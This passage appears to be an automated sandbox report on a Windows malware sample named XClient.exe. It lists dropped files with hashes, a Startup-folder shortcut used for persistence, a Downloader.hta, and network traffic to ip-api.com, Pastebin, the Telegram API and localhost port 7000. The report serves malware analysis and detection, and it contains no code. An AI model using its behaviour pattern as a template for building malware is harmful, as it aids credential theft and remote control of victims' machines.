C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Windows\system32\NETSTAT.EXE
netstat -a
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | www.example.com | udp |
| US | 93.184.215.14:80 | www.example.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 14.215.184.93.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| NL | 142.250.27.104:443 | www.google.com | tcp |
| NL | 142.250.27.104:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 94.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.27.250.142.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.250.102.100:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 142.250.102.100:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 100.102.250.142.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.250.27.95:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 95.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.102.250.142.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| GB | 172.217.169.3:443 | beacons.gcp.gvt2.com | tcp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 1.0.127.10.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp |
Files
memory/2460-0-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-2-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-1-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-6-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-12-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-11-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-10-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-9-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-8-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2460-7-0x0000020DE33F0000-0x0000020DE33F1000-memory.dmp
memory/2588-14-0x0000000000B10000-0x0000000000B20000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cmrleyub.b5q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1940-19-0x000001F645620000-0x000001F645642000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 62623d22bd9e037191765d5083ce16a3 |
| SHA1 | 4a07da6872672f715a4780513d95ed8ddeefd259 |
| SHA256 | 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010 |
| SHA512 | 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5fbb56518e82d1b1e5ef6be3b6693880 |
| SHA1 | 4e7671d0193b6f640d81b3fb91ac17ca67e0632b |
| SHA256 | 760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40 |
| SHA512 | ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 15dde0683cd1ca19785d7262f554ba93 |
| SHA1 | d039c577e438546d10ac64837b05da480d06bf69 |
| SHA256 | d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961 |
| SHA512 | 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672 |
memory/3872-63-0x0000000000680000-0x00000000006DC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 22310ad6749d8cc38284aa616efcd100 |
| SHA1 | 440ef4a0a53bfa7c83fe84326a1dff4326dcb515 |
| SHA256 | 55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf |
| SHA512 | 2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b1a1d8b05525b7b0c5babfd80488c1f2 |
| SHA1 | c85bbd6b7d0143676916c20fd52720499c2bb5c6 |
| SHA256 | adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705 |
| SHA512 | 346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83685d101174171875b4a603a6c2a35c |
| SHA1 | 37be24f7c4525e17fa18dbd004186be3a9209017 |
| SHA256 | 0c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870 |
| SHA512 | 005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 120c6c9af4de2accfcff2ed8c3aab1af |
| SHA1 | 504f64ae4ac9c4fe308a6a50be24fe464f3dad95 |
| SHA256 | 461315e4057c3fa4d0031df3f7e6511914f082698b6c41f5c2ada831ceffb222 |
| SHA512 | 041712168718dff702da8203b4089b2e57db98ce503b8ecf36809dec0cd7a595a0d427caa960bc1bd29cbedc85ad3262773f2077a476b85aca387d48f7b07ba2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
| MD5 | 52004c9035f277741a84ddae174c17ac |
| SHA1 | 17854a6f6841f4fd72671e6ca09ae08ffaf31399 |
| SHA256 | 665533ec2c889675d1ec0063ea1a357108573d1d6d48b22ad699a27d9b161a25 |
| SHA512 | 8a286286df1c0a5c80436c751a69755fe1776748b48cd817e0f5be6905785d16549ca2b1552729b3a9004818d68cbfba40428368f1fd2a206c518264083486ac |
memory/4992-113-0x0000000000D90000-0x0000000002312000-memory.dmp
C:\Users\Admin\AppData\Roaming\XClient.exe
| MD5 | 767d4d113ea2e9d9886b2aa1710db7f3 |
| SHA1 | f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0 |
| SHA256 | b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f |
| SHA512 | ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/4604-130-0x0000000000890000-0x00000000008E0000-memory.dmp
C:\ProgramData\XClient.exe
| MD5 | ba94afbb2cc287ed2cd9215ff47303bd |
| SHA1 | 044a6f3e6855111f3bb862afd1136ac8b5ccd0ac |
| SHA256 | 8cd2fd789acadb7f6da3d8d84789fb22398d0bcb8c110347f94c0a3174804794 |
| SHA512 | 966f23de444af27ac44db286de61512cae2304878ae134a18902c8d4ea1609eea37d8fdc3424d64336116074154f3dbc55841a707302325d4114b143892ed72b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9bc110200117a3752313ca2acaf8a9e1 |
| SHA1 | fda6b7da2e7b0175b391475ca78d1b4cf2147cd3 |
| SHA256 | c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb |
| SHA512 | 1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 67e8893616f805af2411e2f4a1411b2a |
| SHA1 | 39bf1e1a0ddf46ce7c136972120f512d92827dcd |
| SHA256 | ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31 |
| SHA512 | 164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5cfe303e798d1cc6c1dab341e7265c15 |
| SHA1 | cd2834e05191a24e28a100f3f8114d5a7708dc7c |
| SHA256 | c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab |
| SHA512 | ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e |
memory/4476-216-0x0000000000630000-0x000000000063E000-memory.dmp
C:\Users\Admin\AppData\Roaming\Output.exe
| MD5 | a731d63dc3edd963b906d0f861f7119c |
| SHA1 | 378d5339f1b675e98c81f4446f9e9ad81bc9da9f |
| SHA256 | 94e34e1ab4c0941edda34585cb048af9b4bf4a8e3e9042e3986b597b839f4dad |
| SHA512 | 39d39f34144538fa4d822aa806e0994dacc64da2358001de2b7e07400218e60302630ed28b74a3ca293a6b20cb30fadfeb342e8f5060a083753fd4674390d0a6 |
memory/4820-230-0x0000000000A30000-0x0000000000A3C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Downloader.hta
| MD5 | f27fe2354ebb52cffbb3a8cf66c6bdb3 |
| SHA1 | 439ce7924db3f534a14d78470c57c98e397969ee |
| SHA256 | 30211495aba380e4649ba7a892fea8523b0857a1db4a3be3ec59a822d385a6b4 |
| SHA512 | 7e22d88538dd3d9e853002fc7caf149c047be7c17dff24061236b9a29f558d53949b2a1a46e74185e32341c1fa3e2d7b9ce3917bd5e988cd12ea380acbf33c0f |
\??\pipe\crashpad_4920_KBHEKGALBYIYRDOE
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 45862294cc2c180960c27488d1a778ef |
| SHA1 | cbcbcc3b9659224d21f3e09bb0252566b7de9155 |
| SHA256 | 4c58f019372a156bd5ed2fea605b17878890f0975aca096ae87133bd472e22e6 |
| SHA512 | 4fbb999cf88ccd271b1c0d9059ec4464f90eda252987ec51dd0ac6c1fdb301d4ac92734f76790730852b7d713a16c0e71320fea50307b984dae407c4988db72d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 21e08c72ba7d29922554d9f1c2b96028 |
| SHA1 | d303ab5d66a924a384322ce809aa8d2de18df606 |
| SHA256 | b9f8efdf1f66d8c169f872a64491e90121f3a590d7fb5ab2f7006c468a24fe09 |
| SHA512 | ebd10e64d9aaa92e58b30b6a9af91a19e6846bc8ccdf103aef66b71d991861573c9136445834e0bbba7557a93c8ed925a3609ae3d3332cc5fc54dc4cf83894a9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | ea233fcf56040c247cddf5153fb4d598 |
| SHA1 | 3e3c8aa44c12faf1b7211762718b2f17c5fe4b18 |
| SHA256 | 7799cd9ed7ac5776a8d7ca4f9c5624b3bc8b398ae9d44b3d0b3a1360c2b68b69 |
| SHA512 | 4d855eea45f419f6d71bad0e4818d0bbffa01d0f07e7a084dcbad1509caafbe876d71c728cccf0debcb46bb12ac5d7e4a6efbe7b98a30453ceeea30b779293fe |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 0e941e59959afcf9bf675b5a2b7a95b3 |
| SHA1 | 5d92c591319ed2641e5d542639bc303ce2585dba |
| SHA256 | ff0c8e684100609c77ed0a64cef401a3171b1cc4dc0b5b5f97c6707cdb425ded |
| SHA512 | 3825e4011891d8b8187ca99eef26c69e1e00efeb286bbc97e1f61453870b2ba33b8f7f6d80d9a0b37194cfffa920206f181f775d851805d23df1321daff9c499 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | dae3ee455200983b541b4543eebdba63 |
| SHA1 | 187fc844dacadd1048c9239616daf2f4fddeee57 |
| SHA256 | 5cc761b0882aa2305c529aae4fdd31070a2b541c3aca4c71c93b5e2dd1b18054 |
| SHA512 | 869d5d8ea5a1166b912f8df73fa8db4a7aa4ce1cfe3506fc04cd0d17c43cb383fc306bc0ec5bb6e5f52b31ff0987813235c8fe2647ce353ca338914a4cd1922a |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 6354646f5acb71de981f9b4396da7232 |
| SHA1 | 165df8b4093ed1e3cbea5cbdb0722d7747f5b764 |
| SHA256 | 18a043a1763c7d5e8ac7d0e2dd97c54f705be5491eefea22b3cba95ae83b9704 |
| SHA512 | 8fabac9aa22ca1eb12ddb6461483d5598fc3872ddbe8bb9a1081524f22ccd99c4ef20b5929cad5c01a273de61fe6df8b8e9696d6ad163bfa0a4d2b117346e718 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 01e2e41ad59da97e7da947a1d084ee07 |
| SHA1 | 88c48ebefd97d6ac162fce44231e0937c4a1372c |
| SHA256 | ee88260c333a01f1ca7d980082dd9d5370848f92330faefe8a8e256b6b4d1611 |
| SHA512 | 62862c69c8d8ac8c36e82620552862987298b648087786901cdf2989be4c31dfbfa5d01550aabfcd1f244299c5a021c1f36d0eb823e3e76e3a8a39d5cd696e0c |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 14629e58678ed0d1e5580e4042eba597 |
| SHA1 | 48530ca98cc9adce4f212ac333111c9b7ddeff9b |
| SHA256 | f6ed1dcd65bff248338949ec73af1efe8f8714630d0039ef17aa67e645f4f649 |
| SHA512 | 7808da46ef5ba22f9de08a170e5ba94ccfb723285d02c5c8b304cb259a373ecf9e804cebb2e8b06a317aeddddbb4d8634632877bbdb0188cd8bcd15e3353687f |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | fd59e9d5b312dad7750335c6d41a8178 |
| SHA1 | e73dee5eeb54c49087a0a8c1c2fa8a1140f770b4 |
| SHA256 | e50eaf3e968b29be529ae910ff6345bbc5dc5e10b0988d8b6f0abec88cd01191 |
| SHA512 | 6858295e78d542402435b915d08eb5d7d9fecb1fd67701f80c62b9d1c03b67850bc6c5392b6cb20a67f0ee56f65f71befcdeb93115de337d955939201efceff8 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 85e39e714991db8c3c200e689e012db9 |
| SHA1 | e3c5712fc4db26146b98c644d01ad9a51451aaff |
| SHA256 | 5c5a4fb72b279eac5501ef28facec45818a4e847636ea02b961db8bc8f14cd0f |
| SHA512 | e5057156c1025465fdeb718139fab9e8e738f6b14beb3400955ca79c8da4c34ad955485caf4766cc91af73247e9e767913439f8fbed62f5b4d82fdcfb217507d |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 7aa2d4fb751a3764d309f22e616a75ba |
| SHA1 | 1242d146875fb57c4f522efb1c67ba5796d93353 |
| SHA256 | be4e46e6da06273d8dedc623eda41b6cafbef9d4c95c455044b8e8b4eb50ab36 |
| SHA512 | fb92fe3b0bb7754a589d691b39f4f7f0f0c19cc1668984bbafd8fc7009d6a795642bbadbbe2880e67e79c26a8f5450c8261cf2402b87d1c837c92fd19c097f6f |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 2d564cf01b6ca8ae51cd212c2c5dd340 |
| SHA1 | 8d3c15825ce3b458dfb4d3e36b836b6ac76bde4f |
